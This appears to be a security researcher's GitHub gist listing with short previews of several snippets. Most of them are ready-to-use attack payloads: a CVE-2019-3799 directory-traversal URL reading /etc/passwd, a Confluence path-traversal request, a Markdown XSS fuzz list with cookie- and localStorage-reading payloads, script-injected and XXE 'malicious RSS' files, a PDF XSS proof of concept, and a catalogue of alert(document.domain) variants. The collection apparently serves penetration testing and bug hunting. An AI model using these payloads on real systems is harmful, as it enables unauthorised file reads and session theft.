Yassine ABOUKIR yassineaboukir
🐐
yassineaboukir
/ CVE-2019-3799
Created
April 26, 2019 10:53
CVE-2019-3799: Directory Traversal with spring-cloud-config-server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://example.com:8081/label/default/master/..%252F..%252F..%252F../etc/passwd | |
| ref: https://twitter.com/chybeta/status/1118370858974760963?s=19 |
yassineaboukir
/ warfare.php
Last active
October 8, 2019 06:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <pre>phpinfo();</pre> |
yassineaboukir
/ Confluence Path traversal
Created
April 10, 2019 15:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /rest/tinymce/1/macro/preview HTTP/1.1 | |
| Host: xxx.com | |
| Connection: close | |
| Accept-Encoding: gzip, deflate | |
| Accept: text/html, */*; q=0.01 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | |
| X-Atlassian-Token: no-check | |
| Content-Type: application/json; charset=utf-8 | |
| Referer: https://xxxx.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23& | |
| Content-Length: 168 |
yassineaboukir
/ Markdown XSS fuzzlist
Created
May 9, 2019 00:48
Source: https://github.com/JakobRPennington/InformationSecurity/tree/master/Payloads/md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Basic](javascript:alert('Basic')) | |
| [Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
| [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
| [URL](javascript://www.google.com%0Aalert('URL')) | |
| [In Quotes]('javascript:alert("InQuotes")') | |
| ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) | |
| ![Escape SRC - onerror]("onerror="alert('ImageOnError')) | |
| [XSS](javascript:prompt(document.cookie)) | |
| [XSS](j a v a s c r i p t:prompt(document.cookie)) | |
| [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) |
yassineaboukir
/ twitterFollowerCuratorBot.php
Created
May 27, 2021 13:05
— forked from levelsio/twitterFollowerCuratorBot.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| // | |
| // AUTO KEYWORD-BASED FOLLOWER CURATION BOT (by @levelsio) | |
| // | |
| // File: twitterFollowerCuratorBot.php | |
| // | |
| // Created: May 2021 | |
| // License: MIT | |
| // |
yassineaboukir
/ rss2.xml
Last active
March 16, 2022 18:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>Data <![CDATA[<]]>script<![CDATA[>]]>alert(0)<![CDATA[<]]>/script<![CDATA[>]]></title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> | |
| <lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate> | |
| <generator>Libsyn <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]> 2.0</generator> | |
| <link>http://dataskeptic.com</link> | |
| <language>en</language> |
yassineaboukir
/ rss.xml
Last active
March 17, 2022 15:45
Malicious RSS for security testing purposes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE xxe [ | |
| <!ENTITY xxe SYSTEM | |
| "file:///etc/passwd" > | |
| ]> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>&xxe</title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> |
yassineaboukir
/ poc.js
Created
May 7, 2022 22:42
— forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
yassineaboukir
/ Electron app decompiling
Created
June 12, 2019 01:10
Obtain the source code of Electron applications
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Open terminal and install asar node module globally | |
| $ npm install -g asar | |
| # Go into the app’s directory, in our case it’s Slack | |
| $ cd /Applications/Slack.app/Contents/Resources | |
| # Create a directory to paste the content of app |
yassineaboukir
/ alert.js
Created
March 24, 2021 14:08
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
OlderNewer